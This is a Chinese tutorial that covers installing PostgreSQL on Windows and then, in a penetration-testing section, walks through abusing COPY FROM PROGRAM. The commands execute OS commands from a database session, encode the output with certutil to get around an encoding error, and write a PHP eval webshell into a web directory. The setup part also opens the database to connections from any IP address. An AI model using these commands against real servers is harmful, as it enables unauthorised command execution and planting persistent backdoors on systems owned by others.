Postgresql 安装

下载

下载地址：

https://www.enterprisedb.com/download-postgresql-binaries

建立数据存储文件夹

配置环境变量

保存为env.vbs

 1on error resume next
 2set sysenv=CreateObject("WScript.Shell").Environment("system") 'system environment array
 3Path = CreateObject("Scripting.FileSystemObject").GetFolder(".").Path 'add variable
 4sysenv("PGHOME")="C:pgsql"
 5sysenv("PGHOST")="localhost"
 6sysenv("Path")=sysenv("PGHOME")+"bin;"+sysenv("Path")
 7sysenv("PGLIB")=sysenv("PGHOME")+"lib"
 8sysenv("PGDATA")=sysenv("PGHOME")+"data"
 9
10wscript.echo "PostgreSQL Success"

修改对应路径即可

初始化数据库

1initdb.exe -D C:pgsqldata -E UTF-8 --locale=chs -U postgres -W

注册服务

1pg_ctl register -N PostgreSQL -D C:pgsqldata

服务名称为PostgreSQL

Postgresql 允许远程连接

修改pg_hba.conf

添加允许访问IP，认证方式为md5

1host all all 0.0.0.0/0 md5

修改监听配置

修改 postgresql.conf文件,允许所有的链接

1listen_addresses = ‘*’ # what IP address(es) to listen on;

这两个文件都在data目录下

连接

渗透中遇到的问题

问题1 - 提权

1DROP TABLE IF EXISTS cmd_exec;
2CREATE TABLE cmd_exec(cmd_output text);
3COPY cmd_exec FROM PROGRAM 'dir';
4SELECT * FROM cmd_exec;

error

 1DROP TABLE IF EXISTS cmd_exec
 2> OK
 3> 时间: 0.004s
 4CREATE TABLE cmd_exec(cmd_output text)
 5> OK
 6> 时间: 0.002s
 7COPY cmd_exec FROM PROGRAM 'dir'
 8> ERROR:  invalid byte sequence for encoding "UTF8": 0xc7 0xfd
 9CONTEXT:  COPY cmd_exec, line 1
10
11> 时间: 0.01s

问题原因

返回的数据为中文，无法直接输出带中文的结果。

尝试方案

确定文件是否成功写入，尝试通过certutil将文件内容全部编码，然后解码进行输出。

解决方案

certuiil

通过certutil进行编码文件

1DROP TABLE IF EXISTS cmd_exec;
2CREATE TABLE cmd_exec(cmd_output text);
3COPY cmd_exec FROM PROGRAM 'certutil -encode 1.txt 3.txt';
4SELECT * FROM cmd_exec;

尽管报错了，但是文件已经成功被编码输出。

通过type进行读取

保存到本地，通过certutil进行还原。

写webshell

1DROP TABLE IF EXISTS cmd_exec;
2CREATE TABLE cmd_exec(cmd_output text);
3COPY cmd_exec FROM PROGRAM 'echo ^<?php eval($_POST[a]);?^> > C:phpstudy_proWWW7.php';
4SELECT * FROM cmd_exec;

触类旁通

查看当前路径

dir>1.txt

dir > 2.txt

也可成功执行

参考链接：

http://www.qb5200.com/article/308205.html